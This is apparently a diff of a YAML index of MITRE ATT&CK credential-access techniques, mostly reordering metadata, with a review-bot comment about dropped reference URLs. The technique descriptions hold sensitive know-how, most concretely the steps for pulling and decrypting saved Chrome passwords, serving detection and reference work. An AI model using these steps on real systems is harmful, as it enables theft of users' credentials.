- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-25T18:40:15.564Z'
- created: '2020-02-11T18:48:28.456Z'
+ name: Credentials from Password Stores
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1555
+ url: https://attack.mitre.org/techniques/T1555
x_mitre_platforms:
- Linux
- macOS
@@ -16494,6 +16786,40 @@ credential-access:
atomic_tests: []
T1555.003:
technique:
+ created: '2020-02-12T18:57:36.041Z'
+ modified: '2020-02-17T13:20:02.386Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
+ id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+ description: "Adversaries may acquire credentials from web browsers by reading
+ files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
+ Web browsers commonly save credentials such as website usernames and passwords
+ so that they do not need to be entered manually in the future. Web browsers
+ typically store the credentials in an encrypted format within a credential
+ store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor
+ example, on Windows systems, encrypted credentials may be obtained from Google
+ Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User
+ Data\\Default\\Login Data and executing a SQL query: SELECT action_url,
+ username_value, password_value FROM logins;. The plaintext password
+ can then be obtained by passing the encrypted credentials to the Windows API
+ function CryptUnprotectData, which uses the victim’s cached logon
+ credentials as the decryption key. (Citation: Microsoft CryptUnprotectData
+ April 2018)\n \nAdversaries have executed similar procedures for common web
+ browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential
+ Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)\n\nAdversaries
+ may also acquire credentials by searching web browser process memory for patterns
+ that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter
+ acquiring credentials from web browsers, adversaries may attempt to recycle
+ the credentials across different systems and/or accounts in order to expand
+ access. This can result in significantly furthering an adversary's objective
+ in cases where credentials gained from web browsers overlap with privileged
+ accounts (e.g. domain administrator)."
+ name: Credentials from Web Browsers
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1555.003
@@ -16519,40 +16845,6 @@ credential-access:
url: https://github.com/putterpanda/mimikittenz
description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
Retrieved June 20, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Credentials from Web Browsers
- description: "Adversaries may acquire credentials from web browsers by reading
- files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
- Web browsers commonly save credentials such as website usernames and passwords
- so that they do not need to be entered manually in the future. Web browsers
- typically store the credentials in an encrypted format within a credential
- store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor
- example, on Windows systems, encrypted credentials may be obtained from Google
- Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User
- Data\\Default\\Login Data and executing a SQL query: SELECT action_url,
- username_value, password_value FROM logins;. The plaintext password
- can then be obtained by passing the encrypted credentials to the Windows API
- function CryptUnprotectData, which uses the victim’s cached logon
- credentials as the decryption key. (Citation: Microsoft CryptUnprotectData
- April 2018)\n \nAdversaries have executed similar procedures for common web
- browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential
- Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)\n\nAdversaries
- may also acquire credentials by searching web browser process memory for patterns
- that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter
- acquiring credentials from web browsers, adversaries may attempt to recycle
- the credentials across different systems and/or accounts in order to expand
- access. This can result in significantly furthering an adversary's objective
- in cases where credentials gained from web browsers overlap with privileged
- accounts (e.g. domain administrator)."
- id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-02-17T13:20:02.386Z'
- created: '2020-02-12T18:57:36.041Z'
x_mitre_platforms:
- Linux
- macOS
@@ -16660,28 +16952,28 @@ credential-access:
phase_name: credential-access
modified: '2020-02-07T20:49:18.834Z'
created: '2020-02-04T12:58:40.678Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Sudhanshu Chauhan, @Sudhanshu_C
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Ability to query some Registry locations depends on the adversary's level
+ of access. User permissions are usually limited to access of user-related
+ Registry keys.
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Monitor processes for applications that can be used to query
the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and
collect command parameters that may indicate credentials are being searched.
Correlate activity with related suspicious behavior that may indicate an active
intrusion to reduce false positives.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_system_requirements:
- - Ability to query some Registry locations depends on the adversary's level
- of access. User permissions are usually limited to access of user-related
- Registry keys.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Windows Registry
+ x_mitre_contributors:
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ x_mitre_platforms:
+ - Windows
identifier: T1552.002
atomic_tests:
- name: Enumeration for Credentials in Registry
@@ -16778,20 +17070,20 @@ credential-access:
phase_name: credential-access
modified: '2020-03-24T20:46:23.547Z'
created: '2020-02-11T18:45:34.293Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_data_sources:
+ - Windows event logs
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
- x_mitre_permissions_required:
- - Administrator
- x_mitre_data_sources:
- - Windows event logs
- x_mitre_contributors:
- - Vincent Le Toux
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1556.001:
technique:
@@ -16832,10 +17124,12 @@ credential-access:
phase_name: defense-evasion
modified: '2020-03-25T20:51:30.829Z'
created: '2020-02-11T19:05:02.399Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - API monitoring
+ - DLL monitoring
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: "Monitor for calls to OpenProcess that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -16850,12 +17144,10 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
- x_mitre_permissions_required:
- - Administrator
- x_mitre_data_sources:
- - Authentication logs
- - API monitoring
- - DLL monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1212:
technique:
@@ -16894,26 +17186,26 @@ credential-access:
phase_name: credential-access
modified: '2020-03-25T18:51:01.070Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - John Lambert, Microsoft Threat Intelligence Center
- x_mitre_data_sources:
- - Authentication logs
- - Windows Error Reporting
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Software exploits may not always succeed or may cause
the exploited process to become unstable or crash. Also look for behavior
on the system that might indicate successful compromise, such as abnormal
behavior of processes. Credential resources obtained through exploitation
may be detectable in use if they are not normally used or seen.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Authentication logs
+ - Windows Error Reporting
+ - Process monitoring
+ x_mitre_contributors:
+ - John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_version: '1.1'
atomic_tests: []
T1187:
technique:
@@ -16958,8 +17250,8 @@ credential-access:
21, 2017.
source_name: Cylance Redirect to SMB
- url: https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/
- description: Malith, O. (2017, March 24). Places of Interest in Stealing NetNTLM
- Hashes. Retrieved January 26, 2018.
+ description: Osanda Malith Jayathissa. (2017, March 24). Places of Interest
+ in Stealing NetNTLM Hashes. Retrieved January 26, 2018.
source_name: Osanda Stealing NetNTLM Hashes
- url: https://www.us-cert.gov/ncas/alerts/TA17-293A
description: 'US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent
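Review bot: Both references in this hunk lose their `url` key on the new side — the `https://osandamalith.com/...` line is deleted when the description is reworded, and the `https://www.us-cert.gov/ncas/alerts/TA17-293A` line is deleted with no replacement — so the "Osanda Stealing NetNTLM Hashes" and "US-CERT APT Energy Oct 2017" citations used by the T1187 detection text are no longer resolvable from this file. Dropping the Osanda link may be intentional if that page is gone, but the US-CERT alert is still a primary source and should keep `url: https://www.us-cert.gov/ncas/alerts/TA17-293A` under its entry. If this index is regenerated from the upstream ATT&CK STIX bundle, the fix belongs in the upstream data rather than in this file. The enclosing `external_references` list begins before this hunk.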
@@ -16972,26 +17264,26 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-25T20:32:05.842Z'
+ modified: '2020-06-19T17:16:41.470Z'
created: '2018-01-16T16:13:52.465Z'
- x_mitre_version: '1.2'
- x_mitre_contributors:
- - Teodor Cimpoesu
- - Sudhanshu Chauhan, @Sudhanshu_C
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
+
+ Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)
x_mitre_data_sources:
- File monitoring
- Network protocol analysis
- Network device logs
- Process use of network
- x_mitre_detection: |-
- Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
-
- Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Teodor Cimpoesu
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ x_mitre_version: '1.2'
atomic_tests: []
T1056.002:
technique:
@@ -17045,24 +17337,24 @@ credential-access:
phase_name: credential-access
modified: '2020-03-24T20:56:14.853Z'
created: '2020-02-11T18:58:45.908Z'
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
-
- Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.
- x_mitre_permissions_required:
- - User
+ x_mitre_contributors:
+ - Matthew Molyett, @s1air, Cisco Talos
x_mitre_data_sources:
- PowerShell logs
- User interface
- Process command-line parameters
- Process monitoring
- x_mitre_contributors:
- - Matthew Molyett, @s1air, Cisco Talos
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
+
+ Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Windows
identifier: T1056.002
atomic_tests:
- name: AppleScript - Prompt User for Password
@@ -17153,10 +17445,11 @@ credential-access:
phase_name: credential-access
modified: '2020-03-31T12:59:10.840Z'
created: '2020-02-11T19:13:33.643Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Windows event logs
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitor for anomalous Kerberos activity, such as malformed
or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634),
RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation:
@@ -17165,11 +17458,10 @@ credential-access:
that differ from the default domain duration.(Citation: Microsoft Kerberos
Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)
being used to move laterally. \n"
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Authentication logs
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1552.006:
technique:
@@ -17214,21 +17506,21 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-31T12:53:56.361Z'
+ modified: '2020-06-17T14:25:38.082Z'
created: '2020-02-11T18:43:06.253Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Windows event logs
x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
in SYSVOL)"
- x_mitre_data_sources:
- - Process command-line parameters
- - Windows event logs
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
identifier: T1552.006
atomic_tests:
- name: GPP Passwords (findstr)
@@ -17322,22 +17614,9 @@ credential-access:
phase_name: credential-access
modified: '2020-03-24T21:29:13.900Z'
created: '2017-05-31T21:30:48.323Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
- x_mitre_detection: 'Detection may vary depending on how input is captured but
- may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
- `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
- monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
- and ensuring no unauthorized drivers or kernel modules that could indicate
- keylogging or API hooking are present.'
+ x_mitre_version: '1.1'
+ x_mitre_contributors:
+ - John Lambert, Microsoft Threat Intelligence Center
x_mitre_data_sources:
- Windows Registry
- Windows event logs
@@ -17350,9 +17629,22 @@ credential-access:
- DLL monitoring
- Binary file metadata
- API monitoring
- x_mitre_contributors:
- - John Lambert, Microsoft Threat Intelligence Center
- x_mitre_version: '1.1'
+ x_mitre_detection: 'Detection may vary depending on how input is captured but
+ may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
+ `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
+ monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
+ and ensuring no unauthorized drivers or kernel modules that could indicate
+ keylogging or API hooking are present.'
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - root
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1558.003:
technique:
@@ -17424,23 +17716,23 @@ credential-access:
phase_name: credential-access
modified: '2020-02-27T18:25:30.124Z'
created: '2020-02-11T18:43:38.588Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_data_sources:
+ - Authentication logs
+ - Windows event logs
+ x_mitre_system_requirements:
+ - Valid domain account or the ability to sniff traffic within a domain
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4769, within a small
time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation:
Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking
Kerberos Dec 2015)'
- x_mitre_system_requirements:
- - Valid domain account or the ability to sniff traffic within a domain
- x_mitre_data_sources:
- - Authentication logs
- - Windows event logs
- x_mitre_contributors:
- - Praetorian
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1558.003
atomic_tests:
- name: Request for service tickets
@@ -17461,6 +17753,12 @@ credential-access:
name: powershell
T1555.001:
technique:
+ created: '2020-02-12T18:55:24.728Z'
+ modified: '2020-02-17T13:14:31.140Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
description: |-
Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.
@@ -17481,28 +17779,22 @@ credential-access:
description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
DA, the OS X Way. Retrieved July 3, 2017.
source_name: External to DA, the OS X Way
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-02-17T13:14:31.140Z'
- created: '2020-02-12T18:55:24.728Z'
+ x_mitre_platforms:
+ - macOS
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_detection: Unlocking the keychain and using passwords from it is a very
+ common process, so there is likely to be a lot of noise in any detection technique.
+ Monitoring of system calls to the keychain can help determine if there is
+ a suspicious process trying to access it.
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_data_sources:
- PowerShell logs
- Process monitoring
- File monitoring
- System calls
- API monitoring
- x_mitre_permissions_required:
- - Administrator
- x_mitre_detection: Unlocking the keychain and using passwords from it is a very
- common process, so there is likely to be a lot of noise in any detection technique.
- Monitoring of system calls to the keychain can help determine if there is
- a suspicious process trying to access it.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - macOS
identifier: T1555.001
atomic_tests:
- name: Keychain
@@ -17534,6 +17826,20 @@ credential-access:
name: sh
T1056.001:
technique:
+ id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
+ description: |-
+ Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
+
+ Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
+
+ * Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
+ * Reading raw keystroke data from the hardware buffer.
+ * Windows Registry modifications.
+ * Custom drivers.
+ name: Keylogging
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1056.001
@@ -17545,20 +17851,6 @@ credential-access:
description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth
look into keyloggers on Windows. Retrieved April 27, 2016.'
source_name: Adventures of a Keystroke
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Keylogging
- description: |-
- Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
-
- Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
-
- * Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
- * Reading raw keystroke data from the hardware buffer.
- * Windows Registry modifications.
- * Custom drivers.
- id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -17699,26 +17991,26 @@ credential-access:
phase_name: collection
modified: '2020-03-31T13:54:08.239Z'
created: '2020-02-11T19:08:51.677Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Eric Kuehn, Secure Ideas
+ - Matthew Demaske, Adaptforward
+ x_mitre_data_sources:
+ - Windows event logs
+ - Windows Registry
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)
Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Windows event logs
- - Windows Registry
- - Packet capture
- - Netflow/Enclave netflow
- x_mitre_contributors:
- - Eric Kuehn, Secure Ideas
- - Matthew Demaske, Adaptforward
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1003.004:
technique:
@@ -17760,12 +18052,12 @@ credential-access:
phase_name: credential-access
modified: '2020-03-24T20:35:42.440Z'
created: '2020-02-21T16:22:09.493Z'
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_data_sources:
+ - Process monitoring
+ - PowerShell logs
+ - Process command-line parameters
x_mitre_detection: 'Monitor processes and command-line arguments for program
execution that may be indicative of credential dumping. Remote access tools
may contain built-in features or incorporate existing tools like Mimikatz.
@@ -17773,12 +18065,12 @@ credential-access:
such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
may require additional logging features to be configured in the operating
system to collect necessary information for analysis.'
- x_mitre_data_sources:
- - Process monitoring
- - PowerShell logs
- - Process command-line parameters
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1003.001:
technique:
@@ -17833,27 +18125,27 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-24T20:34:26.145Z'
+ modified: '2020-06-09T20:46:00.393Z'
created: '2020-02-11T18:41:44.783Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - PowerShell logs
+ - Process monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_data_sources:
- - Process command-line parameters
- - PowerShell logs
- - Process monitoring
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1003.001
atomic_tests:
- name: Windows Credential Editor
@@ -18100,23 +18392,23 @@ credential-access:
phase_name: collection
modified: '2020-03-31T13:54:08.535Z'
created: '2020-02-11T19:07:12.114Z'
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
+ x_mitre_contributors:
+ - Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project
+ x_mitre_detection: Monitor network traffic for anomalies associated with known
+ MiTM behavior. Consider monitoring for modifications to system configuration
+ files involved in shaping network traffic flow.
x_mitre_data_sources:
- File monitoring
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: Monitor network traffic for anomalies associated with known
- MiTM behavior. Consider monitoring for modifications to system configuration
- files involved in shaping network traffic flow.
- x_mitre_contributors:
- - Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project
+ x_mitre_permissions_required:
+ - User
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
atomic_tests: []
T1556:
technique:
@@ -18143,7 +18435,8 @@ credential-access:
description: "Adversaries may modify authentication mechanisms and processes
to access user credentials or enable otherwise unwarranted access to accounts.
The authentication process is handled by mechanisms, such as the Local Security
- Authentication Server (LSASS) process and the Security Accounts Manager (SAM),
+ Authentication Server (LSASS) process and the Security Accounts Manager (SAM)
+ on Windows or pluggable authentication modules (PAM) on Unix-based systems,
responsible for gathering, storing, and validating credentials. \n\nAdversaries
may maliciously modify a part of this process to either reveal credentials
or bypass authentication mechanisms. Compromised credentials or access may
@@ -18158,12 +18451,15 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-25T20:59:05.357Z'
+ modified: '2020-07-13T21:23:01.762Z'
created: '2020-02-11T19:01:56.887Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Authentication logs
+ - API monitoring
+ - Windows Registry
+ - Process monitoring
+ - DLL monitoring
x_mitre_detection: "Monitor for new, unfamiliar DLL files written to a domain
controller and/or local computer. Monitor for changes to Registry entries
for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification
@@ -18173,26 +18469,34 @@ credential-access:
for calls to OpenProcess that can be used to manipulate lsass.exe
running on a domain controller as well as for malicious modifications to functions
exported from authentication-related system DLLs (such as cryptdll.dll and
- samsrv.dll).(Citation: Dell Skeleton) \n\nConfigure robust, consistent account
- activity audit policies across the enterprise and with externally accessible
- services. (Citation: TechNet Audit Policy) Look for suspicious account behavior
- across systems that share accounts, either user, admin, or service accounts.
- Examples: one account logged into multiple systems simultaneously; multiple
- accounts logged into the same machine simultaneously; accounts logged in at
- odd times or outside of business hours. Activity may be from interactive login
- sessions or process ownership from accounts being used to execute binaries
- on a remote system as a particular account. Correlate other security systems
- with login information (e.g., a user has an active login session but has not
- entered the building or does not have VPN access)."
- x_mitre_data_sources:
- - Authentication logs
- - API monitoring
- - Windows Registry
